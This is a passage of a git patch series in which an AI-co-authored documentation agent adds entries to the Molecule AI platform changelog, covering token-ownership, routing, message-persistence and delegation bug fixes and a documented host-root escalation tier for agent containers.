molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. (`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) -- **Claude Code template Kimi K2.6 model routed to official `api.kimi.com/coding` endpoint**: the Claude Code workspace template's adapter now correctly routes `Kimi K2.6` to the official Kimi coding endpoint (`api.kimi.com/coding`) instead of the default Anthropic-compatible endpoint, per Kimi's official API specification. (`molecule-ai-workspace-template-claude-code` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-claude-code/pulls/24)) - -### ๐Ÿงน Internal - -- **Platform Files API groundwork** (`molecule-core`): Phase 1โ€“3 of the Files API roots RFC (`internal#425`) landed across four PRs โ€” the `secrets` package now has a canonical credential-shape regex SSOT (`#1255`); the FilesTab canvas component gains an `/agent-home` root option and a secret-shape denial placeholder (`#1257`); the API gains a stub `allowedRoots` key with a 501 short-circuit (`#1247`); and the handler test suite was hardened to prevent data races during `db.DB` swap (`#1267`). These are infrastructure PRs that enable future per-container home directory isolation โ€” the `/agent-home` root will be documented when the API ships. -- **Scripts CI improvements** (`internal`): SOP tier-check now tolerates empty/invalid tokens while the token is being provisioned (`internal#431`); the `continue-on-error` guard on the PR-body gate is disabled when the runner backlog is draining to avoid silent pass (`internal#437`). - ---- - ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From 521d221597eefcf1d77c42e5f499d334b0ad9265 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 16:17:53 +0000 Subject: [PATCH 10/15] docs(changelog): add molecule-core#1350 poll-mode message persistence fix MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds the poll-mode canvas user-message data-loss fix to the 2026-05-17 section. logA2AReceiveQueued only wrote to the in-memory queue, not durable storage โ€” the persist call now runs before the poll-mode short-circuit. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 939d48c..bfe45b1 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -15,8 +15,7 @@ Entries are published daily at 23:50 UTC. - **OpenClaw template adapter routing: fresh provisions now serve correctly**: OpenClaw workspace provisions were failing immediately after launch โ€” the adapter had no routing path for the default model, causing every new workspace to be non-functional on first boot. The adapter now coerces an unroutable model to a known-good default, ensuring new OpenClaw workspaces are immediately usable without manual configuration. (`molecule-ai-workspace-template-openclaw` [#18](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/18)) - **OpenClaw template MiniMax and Kimi-For-Coding API keys routed to correct endpoints**: the OpenClaw adapter was routing all Minimax (`sk-cp-*` keys) and Kimi-For-Coding (`sk-kimi-*` keys) API calls to the wrong endpoints, causing HTTP 401 errors on every chat turn. Minimax calls now route to the Anthropic-compatible gateway; Kimi-For-Coding calls route via Moonshot's Anthropic-compat endpoint, mirroring the existing MiniMax fix. (`molecule-ai-workspace-template-openclaw` [#14](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/14), [#17](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/17)) - **OpenClaw template now shows molecule platform peers**: OpenClaw workspaces were not returning molecule platform peers in `list_peers` responses โ€” the model was answering via its own native `sessions_list` instead of querying the molecule A2A registry. The adapter now correctly registers the molecule A2A MCP server, so `list_peers` returns platform peers as expected. (`molecule-ai-workspace-template-openclaw` [#16](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/16)) - -> **Note:** Yesterday's (2026-05-16) changelog entry covers Hermes workspace MCP server wiring, bearer-token 401 fixes, Claude Code template Kimi K2.6 routing, and the platform-side token-injection ownership fix โ€” see the [2026-05-16 section](#2026-05-16) below. +- **Poll-mode canvas user messages now persist correctly before returning 200**: canvas chat messages sent via workspaces running in poll mode (`runtime=external`) were occasionally lost when the user exited the chat before the agent processed the message. The root cause was a previous assertion that poll-mode workspaces were unaffected by message-persistence issues โ€” in fact, `logA2AReceiveQueued` (which was assumed to persist at ingest) only wrote to the in-memory queue, not to durable storage. The persist call is now correctly placed before the poll-mode short-circuit, ensuring messages are durable before the canvas receives a `200`. (`molecule-core` [#1350](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1350)) --- -- 2.52.0 From 8c337434302c29cc897082e577708c6a0bba0691 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 22:16:14 +0000 Subject: [PATCH 11/15] docs(changelog): add molecule-core#1348 inbox poller self-echo loop fix Adds the self-delegation-echo fix to the 2026-05-17 section. _is_self_echo_row() predicate now skips a2a_receive rows where source_id == workspace_id, breaking the infinite inbox self-echo loop. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index bfe45b1..852d660 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -16,6 +16,7 @@ Entries are published daily at 23:50 UTC. - **OpenClaw template MiniMax and Kimi-For-Coding API keys routed to correct endpoints**: the OpenClaw adapter was routing all Minimax (`sk-cp-*` keys) and Kimi-For-Coding (`sk-kimi-*` keys) API calls to the wrong endpoints, causing HTTP 401 errors on every chat turn. Minimax calls now route to the Anthropic-compatible gateway; Kimi-For-Coding calls route via Moonshot's Anthropic-compat endpoint, mirroring the existing MiniMax fix. (`molecule-ai-workspace-template-openclaw` [#14](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/14), [#17](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/17)) - **OpenClaw template now shows molecule platform peers**: OpenClaw workspaces were not returning molecule platform peers in `list_peers` responses โ€” the model was answering via its own native `sessions_list` instead of querying the molecule A2A registry. The adapter now correctly registers the molecule A2A MCP server, so `list_peers` returns platform peers as expected. (`molecule-ai-workspace-template-openclaw` [#16](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/16)) - **Poll-mode canvas user messages now persist correctly before returning 200**: canvas chat messages sent via workspaces running in poll mode (`runtime=external`) were occasionally lost when the user exited the chat before the agent processed the message. The root cause was a previous assertion that poll-mode workspaces were unaffected by message-persistence issues โ€” in fact, `logA2AReceiveQueued` (which was assumed to persist at ingest) only wrote to the in-memory queue, not to durable storage. The persist call is now correctly placed before the poll-mode short-circuit, ensuring messages are durable before the canvas receives a `200`. (`molecule-core` [#1350](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1350)) +- **Inbox poller self-echo loop fixed**: when a workspace delegates a task to a target that never picks it up, the platform's `report_activity("a2a_receive")` call records the activity with the sender's workspace UUID as `source_id` (per spoof-defense design). The sender's inbox poller was incorrectly processing this as an incoming message from itself โ€” causing an infinite self-echo loop that flooded the inbox. A new `_is_self_echo_row()` predicate now skips `a2a_receive` rows where `source_id == workspace_id`, breaking the loop. (`molecule-core` [#1348](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1348)) --- -- 2.52.0 From a42b038c02ef7b5bb80d98b4b68c17e25ea06325 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sun, 17 May 2026 02:17:33 +0000 Subject: [PATCH 12/15] docs(changelog): add hermes#24, openclaw#19, openclaw#20 to 2026-05-17 - hermes#24: runtime now runs as agent uid 1000 (fixes list_peers 401) - openclaw#19: T4 host-root escalation leg + list_peers token-ownership fix - openclaw#20: default model coercion requires keyed (not just routable) target Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 3 +++ 1 file changed, 3 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 852d660..6b7af27 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -17,6 +17,9 @@ Entries are published daily at 23:50 UTC. - **OpenClaw template now shows molecule platform peers**: OpenClaw workspaces were not returning molecule platform peers in `list_peers` responses โ€” the model was answering via its own native `sessions_list` instead of querying the molecule A2A registry. The adapter now correctly registers the molecule A2A MCP server, so `list_peers` returns platform peers as expected. (`molecule-ai-workspace-template-openclaw` [#16](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/16)) - **Poll-mode canvas user messages now persist correctly before returning 200**: canvas chat messages sent via workspaces running in poll mode (`runtime=external`) were occasionally lost when the user exited the chat before the agent processed the message. The root cause was a previous assertion that poll-mode workspaces were unaffected by message-persistence issues โ€” in fact, `logA2AReceiveQueued` (which was assumed to persist at ingest) only wrote to the in-memory queue, not to durable storage. The persist call is now correctly placed before the poll-mode short-circuit, ensuring messages are durable before the canvas receives a `200`. (`molecule-core` [#1350](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1350)) - **Inbox poller self-echo loop fixed**: when a workspace delegates a task to a target that never picks it up, the platform's `report_activity("a2a_receive")` call records the activity with the sender's workspace UUID as `source_id` (per spoof-defense design). The sender's inbox poller was incorrectly processing this as an incoming message from itself โ€” causing an infinite self-echo loop that flooded the inbox. A new `_is_self_echo_row()` predicate now skips `a2a_receive` rows where `source_id == workspace_id`, breaking the loop. (`molecule-core` [#1348](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1348)) +- **Hermes workspace runtime now runs as agent uid 1000, not root**: production Hermes workspaces were returning HTTP 401 on `list_peers` because the runtime was running as root. The `start.sh` now runs `molecule-runtime` as agent uid 1000 (via `gosu agent`), preserving the uid-1000 + `/configs/.auth_token` contract that the platform expects. Previously the runtime was accidentally running as root inside the container, breaking token-based auth. (`molecule-ai-workspace-template-hermes` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/24)) +- **OpenClaw T4 host-root escalation leg added**: OpenClaw now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. Also atomically fixes `list_peers` by ensuring the runtime runs as agent uid 1000 (previously ran as root). (`molecule-ai-workspace-template-openclaw` [#19](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/19)) +- **OpenClaw template default model coercion now uses a keyed target**: the OpenClaw adapter's model coercion was finding a routable model but not a keyed one, causing the coercion to fail silently and leave the adapter in a non-functional state. The coercion target must now be both routable AND keyed in the registry. (`molecule-ai-workspace-template-openclaw` [#20](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/20)) --- -- 2.52.0 From 056c54a30063fee906faca6658ff85b7796e2289 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sun, 17 May 2026 04:16:59 +0000 Subject: [PATCH 13/15] docs(changelog): add hermes#26 T4 escalation leg + real CI conformance gate Closes the gap between hermes#24 (uid-1000 fix) and hermes#26 which adds the T4 host-root escalation leg AND a real boot-path assertion in the CI t4-conformance gate (previously a tautology). Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 6b7af27..df97da8 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -18,6 +18,7 @@ Entries are published daily at 23:50 UTC. - **Poll-mode canvas user messages now persist correctly before returning 200**: canvas chat messages sent via workspaces running in poll mode (`runtime=external`) were occasionally lost when the user exited the chat before the agent processed the message. The root cause was a previous assertion that poll-mode workspaces were unaffected by message-persistence issues โ€” in fact, `logA2AReceiveQueued` (which was assumed to persist at ingest) only wrote to the in-memory queue, not to durable storage. The persist call is now correctly placed before the poll-mode short-circuit, ensuring messages are durable before the canvas receives a `200`. (`molecule-core` [#1350](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1350)) - **Inbox poller self-echo loop fixed**: when a workspace delegates a task to a target that never picks it up, the platform's `report_activity("a2a_receive")` call records the activity with the sender's workspace UUID as `source_id` (per spoof-defense design). The sender's inbox poller was incorrectly processing this as an incoming message from itself โ€” causing an infinite self-echo loop that flooded the inbox. A new `_is_self_echo_row()` predicate now skips `a2a_receive` rows where `source_id == workspace_id`, breaking the loop. (`molecule-core` [#1348](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1348)) - **Hermes workspace runtime now runs as agent uid 1000, not root**: production Hermes workspaces were returning HTTP 401 on `list_peers` because the runtime was running as root. The `start.sh` now runs `molecule-runtime` as agent uid 1000 (via `gosu agent`), preserving the uid-1000 + `/configs/.auth_token` contract that the platform expects. Previously the runtime was accidentally running as root inside the container, breaking token-based auth. (`molecule-ai-workspace-template-hermes` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/24)) +- **Hermes workspace T4 host-root escalation leg added**: Hermes now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox (`sudo` + `nsenter` + `docker` group membership) while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. The CI `t4-conformance` gate was also hardened: previously it asserted token-file ownership by creating the file itself (a tautology), so it stayed green even if `exec gosu agent` regressed. It now probes the real boot-path exec of `start.sh` under `MOLECULE_SMOKE_MODE=1` to verify that `molecule-runtime` genuinely runs as uid 1000 โ€” fail-closed on regression. (`molecule-ai-workspace-template-hermes` [#26](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/26)) - **OpenClaw T4 host-root escalation leg added**: OpenClaw now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. Also atomically fixes `list_peers` by ensuring the runtime runs as agent uid 1000 (previously ran as root). (`molecule-ai-workspace-template-openclaw` [#19](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/19)) - **OpenClaw template default model coercion now uses a keyed target**: the OpenClaw adapter's model coercion was finding a routable model but not a keyed one, causing the coercion to fail silently and leave the adapter in a non-functional state. The coercion target must now be both routable AND keyed in the registry. (`molecule-ai-workspace-template-openclaw` [#20](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/20)) -- 2.52.0 From 99de0f0c2f6b3683883ab7da04ee412425e67518 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sun, 17 May 2026 14:16:58 +0000 Subject: [PATCH 14/15] docs(changelog): add molecule-core#1415 Workspace Tokens tab 500 fix MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Settings โ†’ Workspace Tokens crashed with HTTP 500 when no canvas node was selected. The canvas passed "global" as a UUID column value โ†’ Postgres invalid input syntax โ†’ 500. Token handlers now handle the sentinel. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index df97da8..cb7c896 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -21,6 +21,7 @@ Entries are published daily at 23:50 UTC. - **Hermes workspace T4 host-root escalation leg added**: Hermes now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox (`sudo` + `nsenter` + `docker` group membership) while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. The CI `t4-conformance` gate was also hardened: previously it asserted token-file ownership by creating the file itself (a tautology), so it stayed green even if `exec gosu agent` regressed. It now probes the real boot-path exec of `start.sh` under `MOLECULE_SMOKE_MODE=1` to verify that `molecule-runtime` genuinely runs as uid 1000 โ€” fail-closed on regression. (`molecule-ai-workspace-template-hermes` [#26](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/26)) - **OpenClaw T4 host-root escalation leg added**: OpenClaw now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. Also atomically fixes `list_peers` by ensuring the runtime runs as agent uid 1000 (previously ran as root). (`molecule-ai-workspace-template-openclaw` [#19](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/19)) - **OpenClaw template default model coercion now uses a keyed target**: the OpenClaw adapter's model coercion was finding a routable model but not a keyed one, causing the coercion to fail silently and leave the adapter in a non-functional state. The coercion target must now be both routable AND keyed in the registry. (`molecule-ai-workspace-template-openclaw` [#20](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/20)) +- **Workspace Tokens tab no longer crashes with HTTP 500 when no node is selected**: Settings โ†’ Workspace Tokens was returning `500` on both GET (list tokens) and POST (create token) whenever the canvas had no node selected. The canvas was passing the literal sentinel `"global"` as the workspace ID in that state, which the backend interpreted as a UUID column value โ€” Postgres threw `invalid input syntax for type uuid: "global"` โ†’ 500. The token handlers now correctly handle the `"global"` sentinel, returning an empty token list for GET and prompting the user to select a workspace for POST. (`molecule-core` [#1415](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1415)) --- -- 2.52.0 From 9cb33c676ba0e21d593bd0b5427eb2326b0c64d3 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sun, 17 May 2026 23:55:20 +0000 Subject: [PATCH 15/15] docs(changelog): add molecule-core#1446 P0 ctx-detachment delegation fix Delivery-mode lookup was silently falling back to push on context errors, causing poll-mode workspaces to never receive a2a_receive inbox rows. lookupDeliveryMode now propagates context errors explicitly; the proxy fails the delegation HTTP 503 (retryable) instead of silently misrouting. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index cb7c896..3e562c7 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -22,6 +22,7 @@ Entries are published daily at 23:50 UTC. - **OpenClaw T4 host-root escalation leg added**: OpenClaw now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. Also atomically fixes `list_peers` by ensuring the runtime runs as agent uid 1000 (previously ran as root). (`molecule-ai-workspace-template-openclaw` [#19](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/19)) - **OpenClaw template default model coercion now uses a keyed target**: the OpenClaw adapter's model coercion was finding a routable model but not a keyed one, causing the coercion to fail silently and leave the adapter in a non-functional state. The coercion target must now be both routable AND keyed in the registry. (`molecule-ai-workspace-template-openclaw` [#20](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/20)) - **Workspace Tokens tab no longer crashes with HTTP 500 when no node is selected**: Settings โ†’ Workspace Tokens was returning `500` on both GET (list tokens) and POST (create token) whenever the canvas had no node selected. The canvas was passing the literal sentinel `"global"` as the workspace ID in that state, which the backend interpreted as a UUID column value โ€” Postgres threw `invalid input syntax for type uuid: "global"` โ†’ 500. The token handlers now correctly handle the `"global"` sentinel, returning an empty token list for GET and prompting the user to select a workspace for POST. (`molecule-core` [#1415](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1415)) +- **A2A delegation now fails closed on delivery-mode lookup errors instead of silently misrouting**: when a workspace-to-workspace `delegate_task` request arrived with a cancelled request context (e.g. the HTTP connection timed out before the delegation goroutine acquired its own context), `lookupDeliveryMode` returned a context error, which the proxy was silently converting to a `DeliveryModePush` fallback. This caused the poll-mode short-circuit to be skipped โ€” poll-mode workspaces would never receive the `a2a_receive` inbox row, silently losing the delegation. `lookupDeliveryMode` now propagates context errors explicitly; the proxy fails the delegation with HTTP 503 (marking it retryable) instead of silently misrouting it. Other database errors retain the existing fail-open-to-push behavior. (`molecule-core` [#1446](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1446)) --- -- 2.52.0